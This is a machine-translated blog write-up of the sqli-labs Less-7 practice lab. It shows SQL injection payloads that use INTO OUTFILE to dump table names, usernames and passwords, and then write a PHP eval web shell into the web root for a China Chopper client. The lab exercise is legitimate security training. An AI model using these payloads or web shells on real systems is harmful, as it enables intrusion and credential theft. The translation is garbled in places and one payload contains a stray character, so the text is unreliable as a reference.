sqli-labs less -7

Disclaimer: This article is a blogger original article, follow the CC 4.0 BY-SA copyright agreement, reproduced, please attach the original source link and this statement.

This link: https://blog.csdn.net/qq_45106794/article/details/102628325

##sqli-labs less -7

http://localhost/sqli-labs-master/Less-7/?id=1

First, the old way to tell is numeric or character of

With and 1 = 1 and 1 = 2 is determined and is not numeric

Next, a 'and' to determine

Analyzing Results' echo error "Normal Echo

Description is' character

But substituting '- + found

The note also missing some stuff

With speculation)

Found ')) - + normal echo

According to the topic of DUMB outfile

It is possible to export data file vulnerability

so use ')) union select 1,2,3 into outfile "xixi.txt" - +

Even echo error

But you can see the success of the

next can begin to get the database name and user information

'))union select 1,2,table_name from information_schema.tables where table_schema=‘security’ into outfile “xixi.txt”–+

'))union select 1,2,c。olumn_name from information_schema.columns where table_name=‘users’ into outfile “xixi.txt”–+

'))union select 1,2,username from security.users into outfile “xixi.txt”–+

'))union select 1,2,password from security.users into outfile “xixi.txt”–+

#######

Face the problem, it can also be used to solve the structure of a word Trojan

'))union select 1,2, ‘<?php eval($_post["reader"])?>’ into outfile “xixi.php”–+

'))union select 1,2, ‘<?php eval($_post[reader])?>’ into outfile “D:/phpStudy/PHPTutorial/WWW/sqli-labs-master/less-7/xixi.php”–+

And then connect with the Chinese kitchen knife